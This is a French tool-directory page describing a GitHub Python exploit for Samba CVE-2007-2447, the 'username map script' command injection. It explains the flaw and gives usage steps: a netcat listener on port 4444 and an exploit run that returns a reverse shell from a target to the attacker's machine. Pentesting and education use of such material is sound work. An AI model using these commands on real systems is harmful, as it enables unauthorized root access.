Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Samba-CVE-2007-2447-Exploit-Username-Map-Script — Exploit Samba CVE-2007-2447 | Kitploit
Outils/GitHubGitHub/daviddoctor/samba-cve-2007-2447-exploit-username-map-script
Analyse des VulnérabilitésExploitationTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationOutil d'Accès à Distance
GitHubdaviddoctor/samba-cve-2007-2447-exploit-username-map-script

Samba-CVE-2007-2447-Exploit-Username-Map-Script

Exploit Samba CVE-2007-2447

Voir le dépôt
2il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit Samba CVE-2007-2447 (Script de mappage de nom d'utilisateur)

Ce dépôt contient un script Python conçu pour automatiser l'exploitation de la vulnérabilité CVE-2007-2447 sur les serveurs Samba (versions 3.0.20 à 3.0.25rc3). Cet outil a été développé à des fins exclusivement éducatives et pour des tests de pénétration autorisés.

📝 Description technique et académique

La vulnérabilité « Username Map Script » survient en raison du manque d'assainissement de l'entrée des noms d'utilisateur lorsque l'option username map script est activée dans la configuration de Samba. En envoyant un nom d'utilisateur contenant des métacaractères de shell (comme des backticks ` ou des sous-shells $()), le serveur exécute ces commandes avec les privilèges du service (souvent root).

🚀 Prérequis

  • Système d'exploitation : Kali Linux / Parrot OS (ou tout Linux avec smbclient installé).
  • Langage : Python 3.x.
  • Dépendances : smbclient (doit être disponible dans le PATH du système).
  • 🛠️ Installation et utilisation

    1. Cloner le dépôt :
      root@kitploit:~
      git clone [https://github.com/Daviddoctor/Samba-CVE-2007-2447-Exploit-Username-Map-Script-.git]
      cd samba-exploit-cve-2007-2447
      
    2. Donner les permissions d'exécution
      root@kitploit:~
      chmod +x exploit.py
      
    3. Préparer l'écouteur (Kali Linux)
      root@kitploit:~
      nc -lvnp 4444
      
    4. Exécuter l'exploit
      root@kitploit:~
      ./exploit.py <IP_OBJETIVO> <TU_IP_KALI> -p 4444
      
    Télécharger l’outil